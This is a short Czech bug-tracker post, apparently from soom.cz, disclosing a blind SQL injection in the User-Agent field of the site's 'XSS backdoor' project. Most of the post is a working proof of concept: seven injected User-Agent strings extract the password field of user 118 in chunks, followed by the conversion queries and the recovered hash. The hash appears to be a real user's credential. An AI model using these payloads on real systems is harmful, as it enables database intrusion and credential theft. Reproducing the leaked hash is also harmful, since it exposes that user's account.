SQLi - soom.cz (Projekt XSS backdoor)

BugTrack

SQLi - soom.cz (Projekt XSS backdoor)#
V xss backdooru je SQLi v user agentu, pri zobrazeni vypisu zombie. Jedna se o BLIND SQLi v INSERTu. Jde se o stejnou zranitelnost, ktera se nechazela v projektu GET2MAIL [link] a zaroven jiz v roce 2014 v Anonymity Checkeru [link]

Poc:

User agent:
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 1, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 5, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 10, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 15, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 20, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 25, 5)), 16, 10) * '1
1' * CONV(HEX(SUBSTRING((SELECT heslo from users WHERE id='118'), 30, 5)), 16, 10) * '1

Result:
435439560292
430372500326
430456452449
434617279540
219868837689
430321971302
55

To hex:

SELECT unhex(conv(435439560292, 10, 16));
SELECT unhex(conv(430372500326, 10, 16));
SELECT unhex(conv(430456452449, 10, 16));
SELECT unhex(conv(434617279540, 10, 16));
SELECT unhex(conv(219868837689, 10, 16));
SELECT unhex(conv(430321971302, 10, 16));
SELECT unhex(conv(55, 10, 16));

Result:

6562386664
6434333366
6439343561
6531356434
3331343739
6431303066
37

To ascii:

eb8fdd433fd945ae15d431479d100f7

Podrobnosti:
[link]
(odpovědět)
Sinxteniyn | 193.171.202.*26.10.2017 12:58

Zpět
 
 
 

 
BBCode